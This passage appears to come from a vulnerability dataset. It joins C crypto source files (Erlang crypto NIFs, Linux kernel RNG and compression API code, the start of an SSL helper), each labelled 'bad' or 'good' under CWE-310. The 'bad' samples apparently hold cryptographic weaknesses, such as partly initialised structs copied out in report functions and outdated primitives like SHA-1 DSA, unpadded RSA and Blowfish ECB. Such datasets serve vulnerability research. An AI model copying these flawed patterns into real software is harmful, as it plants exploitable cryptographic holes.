{/* (DigestType, Data, Key=[P,Q,G,PrivKey]) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
unsigned int dsa_s_len;
DSA* dsa = DSA_new();
int i;
dsa->pub_key = NULL;
if (!enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->q)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->g)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->priv_key)
|| !enif_is_empty_list(env,tail)) {
goto badarg;
}
if (argv[0] == atom_sha && inspect_mpint(env, argv[1], &data_bin)) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
}
else if (argv[0] == atom_none && enif_inspect_binary(env,argv[1],&data_bin)
&& data_bin.size == SHA_DIGEST_LENGTH) {
memcpy(hmacbuf, data_bin.data, SHA_DIGEST_LENGTH);
}
else {
badarg:
DSA_free(dsa);
return enif_make_badarg(env);
}
enif_alloc_binary(DSA_size(dsa), &ret_bin);
i = DSA_sign(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
ret_bin.data, &dsa_s_len, dsa);
DSA_free(dsa);
if (i) {
if (dsa_s_len != ret_bin.size) {
enif_realloc_binary(&ret_bin, dsa_s_len);
}
return enif_make_binary(env, &ret_bin);
}
else {
return atom_error;
}
}
static int rsa_pad(ERL_NIF_TERM term, int* padding)
{
if (term == atom_rsa_pkcs1_padding) {
*padding = RSA_PKCS1_PADDING;
}
else if (term == atom_rsa_pkcs1_oaep_padding) {
*padding = RSA_PKCS1_OAEP_PADDING;
}
else if (term == atom_rsa_no_padding) {
*padding = RSA_NO_PADDING;
}
else {
return 0;
}
return 1;
}
static ERL_NIF_TERM rsa_public_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data, PublKey=[E,N], Padding, IsEncrypt) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
int padding, i;
RSA* rsa = RSA_new();
if (!enif_inspect_binary(env, argv[0], &data_bin)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_is_empty_list(env,tail)
|| !rsa_pad(argv[2], &padding)) {
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (argv[3] == atom_true) {
ERL_VALGRIND_ASSERT_MEM_DEFINED(data_bin.data,data_bin.size);
i = RSA_public_encrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
}
}
else {
i = RSA_public_decrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
enif_realloc_binary(&ret_bin, i);
}
}
RSA_free(rsa);
if (i > 0) {
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
static ERL_NIF_TERM rsa_private_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data, PrivKey=[E,N,D], Padding, IsEncrypt) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
int padding, i;
RSA* rsa = RSA_new();
if (!enif_inspect_binary(env, argv[0], &data_bin)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->d)
|| !enif_is_empty_list(env,tail)
|| !rsa_pad(argv[2], &padding)) {
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (argv[3] == atom_true) {
ERL_VALGRIND_ASSERT_MEM_DEFINED(data_bin.data,data_bin.size);
i = RSA_private_encrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
}
}
else {
i = RSA_private_decrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
enif_realloc_binary(&ret_bin, i);
}
}
RSA_free(rsa);
if (i > 0) {
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
static ERL_NIF_TERM dh_generate_parameters_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (PrimeLen, Generator) */
int prime_len, generator;
DH* dh_params;
int p_len, g_len;
unsigned char *p_ptr, *g_ptr;
ERL_NIF_TERM ret_p, ret_g;
if (!enif_get_int(env, argv[0], &prime_len)
|| !enif_get_int(env, argv[1], &generator)) {
return enif_make_badarg(env);
}
dh_params = DH_generate_parameters(prime_len, generator, NULL, NULL);
if (dh_params == NULL) {
return atom_error;
}
p_len = BN_num_bytes(dh_params->p);
g_len = BN_num_bytes(dh_params->g);
p_ptr = enif_make_new_binary(env, p_len+4, &ret_p);
g_ptr = enif_make_new_binary(env, g_len+4, &ret_g);
put_int32(p_ptr, p_len);
put_int32(g_ptr, g_len);
BN_bn2bin(dh_params->p, p_ptr+4);
BN_bn2bin(dh_params->g, g_ptr+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(p_ptr+4, p_len);
ERL_VALGRIND_MAKE_MEM_DEFINED(g_ptr+4, g_len);
DH_free(dh_params);
return enif_make_list2(env, ret_p, ret_g);
}
static ERL_NIF_TERM dh_check(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (DHParams=[P,G]) */
DH* dh_params = DH_new();
int i;
ERL_NIF_TERM ret, head, tail;
if (!enif_get_list_cell(env, argv[0], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env,tail)) {
DH_free(dh_params);
return enif_make_badarg(env);
}
if (DH_check(dh_params, &i)) {
if (i == 0) ret = atom_ok;
else if (i & DH_CHECK_P_NOT_PRIME) ret = atom_not_prime;
else if (i & DH_CHECK_P_NOT_SAFE_PRIME) ret = atom_not_strong_prime;
else if (i & DH_UNABLE_TO_CHECK_GENERATOR) ret = atom_unable_to_check_generator;
else if (i & DH_NOT_SUITABLE_GENERATOR) ret = atom_not_suitable_generator;
else ret = enif_make_tuple2(env, atom_unknown, enif_make_uint(env, i));
}
else { /* Check Failed */
ret = enif_make_tuple2(env, atom_error, atom_check_failed);
}
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM dh_generate_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (PrivKey, DHParams=[P,G]) */
DH* dh_params = DH_new();
int pub_len, prv_len;
unsigned char *pub_ptr, *prv_ptr;
ERL_NIF_TERM ret, ret_pub, ret_prv, head, tail;
if (!(get_bn_from_mpint(env, argv[0], &dh_params->priv_key)
|| argv[0] == atom_undefined)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env, tail)) {
DH_free(dh_params);
return enif_make_badarg(env);
}
if (DH_generate_key(dh_params)) {
pub_len = BN_num_bytes(dh_params->pub_key);
prv_len = BN_num_bytes(dh_params->priv_key);
pub_ptr = enif_make_new_binary(env, pub_len+4, &ret_pub);
prv_ptr = enif_make_new_binary(env, prv_len+4, &ret_prv);
put_int32(pub_ptr, pub_len);
put_int32(prv_ptr, prv_len);
BN_bn2bin(dh_params->pub_key, pub_ptr+4);
BN_bn2bin(dh_params->priv_key, prv_ptr+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(pub_ptr+4, pub_len);
ERL_VALGRIND_MAKE_MEM_DEFINED(prv_ptr+4, prv_len);
ret = enif_make_tuple2(env, ret_pub, ret_prv);
}
else {
ret = atom_error;
}
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM dh_compute_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (OthersPublicKey, MyPrivateKey, DHParams=[P,G]) */
DH* dh_params = DH_new();
BIGNUM* pubkey = NULL;
int i;
ErlNifBinary ret_bin;
ERL_NIF_TERM ret, head, tail;
if (!get_bn_from_mpint(env, argv[0], &pubkey)
|| !get_bn_from_mpint(env, argv[1], &dh_params->priv_key)
|| !enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env, tail)) {
ret = enif_make_badarg(env);
}
else {
enif_alloc_binary(DH_size(dh_params), &ret_bin);
i = DH_compute_key(ret_bin.data, pubkey, dh_params);
if (i > 0) {
if (i != ret_bin.size) {
enif_realloc_binary(&ret_bin, i);
}
ret = enif_make_binary(env, &ret_bin);
}
else {
ret = atom_error;
}
}
if (pubkey) BN_free(pubkey);
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM bf_cfb64_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
int bf_n = 0; /* blowfish ivec pos */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_cfb64_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey, &bf_n,
(argv[3] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM bf_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)
|| data_bin.size % 8 != 0) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_cbc_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey,
(argv[3] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM bf_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, IsEncrypt) */
ErlNifBinary key_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)
|| data_bin.size < 8) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
BF_ecb_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
&bf_key, (argv[2] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM blowfish_ofb64_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
int bf_n = 0; /* blowfish ivec pos */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_ofb64_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey, &bf_n);
return ret;
}
#ifdef OPENSSL_THREADS /* vvvvvvvvvvvvvvv OPENSSL_THREADS vvvvvvvvvvvvvvvv */
static INLINE void locking(int mode, ErlNifRWLock* lock)
{
switch (mode) {
case CRYPTO_LOCK|CRYPTO_READ:
enif_rwlock_rlock(lock);
break;
case CRYPTO_LOCK|CRYPTO_WRITE:
enif_rwlock_rwlock(lock);
break;
case CRYPTO_UNLOCK|CRYPTO_READ:
enif_rwlock_runlock(lock);
break;
case CRYPTO_UNLOCK|CRYPTO_WRITE:
enif_rwlock_rwunlock(lock);
break;
default:
ASSERT(!"Invalid lock mode");
}
}
/* Callback from openssl for static locking
*/
static void locking_function(int mode, int n, const char *file, int line)
{
ASSERT(n>=0 && n<CRYPTO_num_locks());
locking(mode, lock_vec[n]);
}
/* Callback from openssl for thread id
*/
static unsigned long id_function(void)
{
return(unsigned long) enif_thread_self();
}
/* Callbacks for dynamic locking, not used by current openssl version (0.9.8)
*/
static struct CRYPTO_dynlock_value* dyn_create_function(const char *file, int line) {
return(struct CRYPTO_dynlock_value*) enif_rwlock_create("crypto_dyn");
}
static void dyn_lock_function(int mode, struct CRYPTO_dynlock_value* ptr,const char *file, int line)
{
locking(mode, (ErlNifRWLock*)ptr);
}
static void dyn_destroy_function(struct CRYPTO_dynlock_value *ptr, const char *file, int line)
{
enif_rwlock_destroy((ErlNifRWLock*)ptr);
}
#endif /* ^^^^^^^^^^^^^^^^^^^^^^ OPENSSL_THREADS ^^^^^^^^^^^^^^^^^^^^^^ */
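/* A minimal sketch of how the callbacks above are typically wired up with
 * OpenSSL's pre-1.1.0 threading API. The real registration presumably lives
 * in this module's load() callback; init_openssl_locking() is a hypothetical
 * name, and lock_vec is assumed to be the ErlNifRWLock** array referenced by
 * locking_function() above. */
#ifdef OPENSSL_THREADS
static int init_openssl_locking(void)
{
    int i;
    lock_vec = enif_alloc(CRYPTO_num_locks() * sizeof(*lock_vec));
    if (lock_vec == NULL)
        return 0;
    for (i = 0; i < CRYPTO_num_locks(); i++) {
        lock_vec[i] = enif_rwlock_create("crypto_stat");
        if (lock_vec[i] == NULL)
            return 0;
    }
    CRYPTO_set_locking_callback(locking_function);
    CRYPTO_set_id_callback(id_function);
    CRYPTO_set_dynlock_create_callback(dyn_create_function);
    CRYPTO_set_dynlock_lock_callback(dyn_lock_function);
    CRYPTO_set_dynlock_destroy_callback(dyn_destroy_function);
    return 1;
}
#endif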
/* HMAC */
static void hmac_md5(unsigned char *key, int klen, unsigned char *dbuf, int dlen,
unsigned char *hmacbuf)
{
MD5_CTX ctx;
char ipad[HMAC_INT_LEN];
char opad[HMAC_INT_LEN];
unsigned char nkey[MD5_LEN];
int i;
/* Change key if longer than 64 bytes */
if (klen > HMAC_INT_LEN) {
MD5(key, klen, nkey);
key = nkey;
klen = MD5_LEN;
}
memset(ipad, '\0', sizeof(ipad));
memset(opad, '\0', sizeof(opad));
memcpy(ipad, key, klen);
memcpy(opad, key, klen);
for (i = 0; i < HMAC_INT_LEN; i++) {
ipad[i] ^= HMAC_IPAD;
opad[i] ^= HMAC_OPAD;
}
/* inner MD5 */
MD5_Init(&ctx);
MD5_Update(&ctx, ipad, HMAC_INT_LEN);
MD5_Update(&ctx, dbuf, dlen);
MD5_Final((unsigned char *) hmacbuf, &ctx);
/* outer MD5 */
MD5_Init(&ctx);
MD5_Update(&ctx, opad, HMAC_INT_LEN);
MD5_Update(&ctx, hmacbuf, MD5_LEN);
MD5_Final((unsigned char *) hmacbuf, &ctx);
}
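/* hmac_md5() above and hmac_sha1() below hand-roll the standard HMAC
 * construction: HMAC(K, m) = H((K' XOR opad) || H((K' XOR ipad) || m)),
 * where K' is the key zero-padded to the 64-byte block size (or first
 * hashed down when longer than 64 bytes), ipad is the byte 0x36 repeated
 * and opad is 0x5c repeated, matching the HMAC_IPAD/HMAC_OPAD constants
 * presumably defined earlier in this file. */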
static void hmac_sha1(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf)
{
SHA_CTX ctx;
char ipad[HMAC_INT_LEN];
char opad[HMAC_INT_LEN];
unsigned char nkey[SHA_LEN];
int i;
/* Change key if longer than 64 bytes */
if (klen > HMAC_INT_LEN) {
SHA1(key, klen, nkey);
key = nkey;
klen = SHA_LEN;
}
memset(ipad, '\0', sizeof(ipad));
memset(opad, '\0', sizeof(opad));
memcpy(ipad, key, klen);
memcpy(opad, key, klen);
for (i = 0; i < HMAC_INT_LEN; i++) {
ipad[i] ^= HMAC_IPAD;
opad[i] ^= HMAC_OPAD;
}
/* inner SHA */
SHA1_Init(&ctx);
SHA1_Update(&ctx, ipad, HMAC_INT_LEN);
SHA1_Update(&ctx, dbuf, dlen);
SHA1_Final((unsigned char *) hmacbuf, &ctx);
/* outer SHA */
SHA1_Init(&ctx);
SHA1_Update(&ctx, opad, HMAC_INT_LEN);
SHA1_Update(&ctx, hmacbuf, SHA_LEN);
SHA1_Final((unsigned char *) hmacbuf, &ctx);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3428_0 |
crossvul-cpp_data_bad_5666_6 | /*
* Cryptographic API.
*
* RNG operations.
*
* Copyright (c) 2008 Neil Horman <nhorman@tuxdriver.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*
*/
#include <linux/atomic.h>
#include <crypto/internal/rng.h>
#include <linux/err.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/random.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
static DEFINE_MUTEX(crypto_default_rng_lock);
struct crypto_rng *crypto_default_rng;
EXPORT_SYMBOL_GPL(crypto_default_rng);
static int crypto_default_rng_refcnt;
static int rngapi_reset(struct crypto_rng *tfm, u8 *seed, unsigned int slen)
{
u8 *buf = NULL;
int err;
if (!seed && slen) {
buf = kmalloc(slen, GFP_KERNEL);
if (!buf)
return -ENOMEM;
get_random_bytes(buf, slen);
seed = buf;
}
err = crypto_rng_alg(tfm)->rng_reset(tfm, seed, slen);
kfree(buf);
return err;
}
static int crypto_init_rng_ops(struct crypto_tfm *tfm, u32 type, u32 mask)
{
struct rng_alg *alg = &tfm->__crt_alg->cra_rng;
struct rng_tfm *ops = &tfm->crt_rng;
ops->rng_gen_random = alg->rng_make_random;
ops->rng_reset = rngapi_reset;
return 0;
}
#ifdef CONFIG_NET
static int crypto_rng_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_rng rrng;
snprintf(rrng.type, CRYPTO_MAX_ALG_NAME, "%s", "rng");
rrng.seedsize = alg->cra_rng.seedsize;
if (nla_put(skb, CRYPTOCFGA_REPORT_RNG,
sizeof(struct crypto_report_rng), &rrng))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_rng_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_rng_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_rng_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : rng\n");
seq_printf(m, "seedsize : %u\n", alg->cra_rng.seedsize);
}
static unsigned int crypto_rng_ctxsize(struct crypto_alg *alg, u32 type,
u32 mask)
{
return alg->cra_ctxsize;
}
const struct crypto_type crypto_rng_type = {
.ctxsize = crypto_rng_ctxsize,
.init = crypto_init_rng_ops,
#ifdef CONFIG_PROC_FS
.show = crypto_rng_show,
#endif
.report = crypto_rng_report,
};
EXPORT_SYMBOL_GPL(crypto_rng_type);
int crypto_get_default_rng(void)
{
struct crypto_rng *rng;
int err;
mutex_lock(&crypto_default_rng_lock);
if (!crypto_default_rng) {
rng = crypto_alloc_rng("stdrng", 0, 0);
err = PTR_ERR(rng);
if (IS_ERR(rng))
goto unlock;
err = crypto_rng_reset(rng, NULL, crypto_rng_seedsize(rng));
if (err) {
crypto_free_rng(rng);
goto unlock;
}
crypto_default_rng = rng;
}
crypto_default_rng_refcnt++;
err = 0;
unlock:
mutex_unlock(&crypto_default_rng_lock);
return err;
}
EXPORT_SYMBOL_GPL(crypto_get_default_rng);
void crypto_put_default_rng(void)
{
mutex_lock(&crypto_default_rng_lock);
if (!--crypto_default_rng_refcnt) {
crypto_free_rng(crypto_default_rng);
crypto_default_rng = NULL;
}
mutex_unlock(&crypto_default_rng_lock);
}
EXPORT_SYMBOL_GPL(crypto_put_default_rng);
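/* A minimal usage sketch, assuming a "stdrng" implementation (e.g. krng or
 * ansi_cprng) is registered; example_fill_random() is a hypothetical helper,
 * not part of this file. A caller takes a reference on the default RNG,
 * draws bytes through the generic rng API, and drops the reference. */
static int example_fill_random(u8 *buf, unsigned int len)
{
	int err;

	err = crypto_get_default_rng();          /* take a ref, seeding it on first use */
	if (err)
		return err;
	err = crypto_rng_get_bytes(crypto_default_rng, buf, len);
	crypto_put_default_rng();                /* drop the ref again */
	return err;
}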
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Random Number Generator");
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5666_6 |
crossvul-cpp_data_good_5666_5 | /*
* Cryptographic API.
*
* Partial (de)compression operations.
*
* Copyright 2008 Sony Corporation
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program.
* If not, see <http://www.gnu.org/licenses/>.
*/
#include <linux/crypto.h>
#include <linux/errno.h>
#include <linux/module.h>
#include <linux/seq_file.h>
#include <linux/string.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
#include <crypto/compress.h>
#include <crypto/internal/compress.h>
#include "internal.h"
static int crypto_pcomp_init(struct crypto_tfm *tfm, u32 type, u32 mask)
{
return 0;
}
static unsigned int crypto_pcomp_extsize(struct crypto_alg *alg)
{
return alg->cra_ctxsize;
}
static int crypto_pcomp_init_tfm(struct crypto_tfm *tfm)
{
return 0;
}
#ifdef CONFIG_NET
static int crypto_pcomp_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_comp rpcomp;
strncpy(rpcomp.type, "pcomp", sizeof(rpcomp.type));
if (nla_put(skb, CRYPTOCFGA_REPORT_COMPRESS,
sizeof(struct crypto_report_comp), &rpcomp))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_pcomp_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_pcomp_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_pcomp_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : pcomp\n");
}
static const struct crypto_type crypto_pcomp_type = {
.extsize = crypto_pcomp_extsize,
.init = crypto_pcomp_init,
.init_tfm = crypto_pcomp_init_tfm,
#ifdef CONFIG_PROC_FS
.show = crypto_pcomp_show,
#endif
.report = crypto_pcomp_report,
.maskclear = ~CRYPTO_ALG_TYPE_MASK,
.maskset = CRYPTO_ALG_TYPE_MASK,
.type = CRYPTO_ALG_TYPE_PCOMPRESS,
.tfmsize = offsetof(struct crypto_pcomp, base),
};
struct crypto_pcomp *crypto_alloc_pcomp(const char *alg_name, u32 type,
u32 mask)
{
return crypto_alloc_tfm(alg_name, &crypto_pcomp_type, type, mask);
}
EXPORT_SYMBOL_GPL(crypto_alloc_pcomp);
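/* A minimal allocation sketch, assuming a pcomp driver such as "zlib" is
 * registered and that crypto_free_pcomp() from <crypto/compress.h> is the
 * matching release helper; example_get_pcomp() is a hypothetical caller and
 * IS_ERR()/PTR_ERR() would additionally need <linux/err.h>. */
static int example_get_pcomp(void)
{
	struct crypto_pcomp *tfm;

	tfm = crypto_alloc_pcomp("zlib", 0, 0);  /* resolved via crypto_alloc_tfm() above */
	if (IS_ERR(tfm))
		return PTR_ERR(tfm);
	/* ... parameter setup and the compress/decompress calls would run here ... */
	crypto_free_pcomp(tfm);
	return 0;
}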
int crypto_register_pcomp(struct pcomp_alg *alg)
{
struct crypto_alg *base = &alg->base;
base->cra_type = &crypto_pcomp_type;
base->cra_flags &= ~CRYPTO_ALG_TYPE_MASK;
base->cra_flags |= CRYPTO_ALG_TYPE_PCOMPRESS;
return crypto_register_alg(base);
}
EXPORT_SYMBOL_GPL(crypto_register_pcomp);
int crypto_unregister_pcomp(struct pcomp_alg *alg)
{
return crypto_unregister_alg(&alg->base);
}
EXPORT_SYMBOL_GPL(crypto_unregister_pcomp);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Partial (de)compression type");
MODULE_AUTHOR("Sony Corporation");
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_5666_5 |
crossvul-cpp_data_bad_5867_1 | /*
* ssl.c v0.0.3
* Copyright (C) 2000 -- DaP <profeta@freemail.c3.hu>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
*/
#ifdef __APPLE__
#define __AVAILABILITYMACROS__
#define DEPRECATED_IN_MAC_OS_X_VERSION_10_7_AND_LATER
#endif
#include "inet.h" /* make it first to avoid macro redefinitions */
#include <openssl/ssl.h> /* SSL_() */
#include <openssl/err.h> /* ERR_() */
#ifdef WIN32
#include <openssl/rand.h> /* RAND_seed() */
#endif
#include "../../config.h"
#include <time.h> /* asctime() */
#include <string.h> /* strncpy() */
#include "ssl.h" /* struct cert_info */
#include <glib.h>
#include <glib/gprintf.h>
#include "util.h"
/* If openssl was built without ec */
#ifndef SSL_OP_SINGLE_ECDH_USE
#define SSL_OP_SINGLE_ECDH_USE 0
#endif
/* globals */
static struct chiper_info chiper_info; /* static buffer for _SSL_get_cipher_info() */
static char err_buf[256]; /* generic error buffer */
/* +++++ Internal functions +++++ */
static void
__SSL_fill_err_buf (char *funcname)
{
int err;
char buf[256];
err = ERR_get_error ();
ERR_error_string (err, buf);
g_snprintf (err_buf, sizeof (err_buf), "%s: %s (%d)\n", funcname, buf, err);
}
static void
__SSL_critical_error (char *funcname)
{
__SSL_fill_err_buf (funcname);
fprintf (stderr, "%s\n", err_buf);
exit (1);
}
/* +++++ SSL functions +++++ */
SSL_CTX *
_SSL_context_init (void (*info_cb_func), int server)
{
SSL_CTX *ctx;
#ifdef WIN32
int i, r;
#endif
SSLeay_add_ssl_algorithms ();
SSL_load_error_strings ();
ctx = SSL_CTX_new (server ? SSLv23_server_method() : SSLv23_client_method ());
SSL_CTX_set_session_cache_mode (ctx, SSL_SESS_CACHE_BOTH);
SSL_CTX_set_timeout (ctx, 300);
SSL_CTX_set_options (ctx, SSL_OP_NO_SSLv2|SSL_OP_NO_SSLv3
|SSL_OP_NO_COMPRESSION
|SSL_OP_SINGLE_DH_USE|SSL_OP_SINGLE_ECDH_USE
|SSL_OP_NO_TICKET
|SSL_OP_CIPHER_SERVER_PREFERENCE);
/* used in SSL_connect(), SSL_accept() */
SSL_CTX_set_info_callback (ctx, info_cb_func);
#ifdef WIN32
/* under win32, OpenSSL needs to be seeded with some randomness */
for (i = 0; i < 128; i++)
{
r = rand ();
RAND_seed ((unsigned char *)&r, sizeof (r));
}
#endif
return(ctx);
}
static void
ASN1_TIME_snprintf (char *buf, int buf_len, ASN1_TIME * tm)
{
char *expires = NULL;
BIO *inMem = BIO_new (BIO_s_mem ());
ASN1_TIME_print (inMem, tm);
BIO_get_mem_data (inMem, &expires);
buf[0] = 0;
if (expires != NULL)
{
/* expires is not \0 terminated */
safe_strcpy (buf, expires, MIN(24, buf_len));
}
BIO_free (inMem);
}
static void
broke_oneline (char *oneline, char *parray[])
{
char *pt, *ppt;
int i;
i = 0;
ppt = pt = oneline + 1;
while ((pt = strchr (pt, '/')))
{
*pt = 0;
parray[i++] = ppt;
ppt = ++pt;
}
parray[i++] = ppt;
parray[i] = NULL;
}
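/* broke_oneline() splits an X509_NAME_oneline() string in place: given
 * "/C=US/O=Example/CN=host", it overwrites each '/' with NUL and leaves
 * parray pointing at {"C=US", "O=Example", "CN=host", NULL}. */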
/*
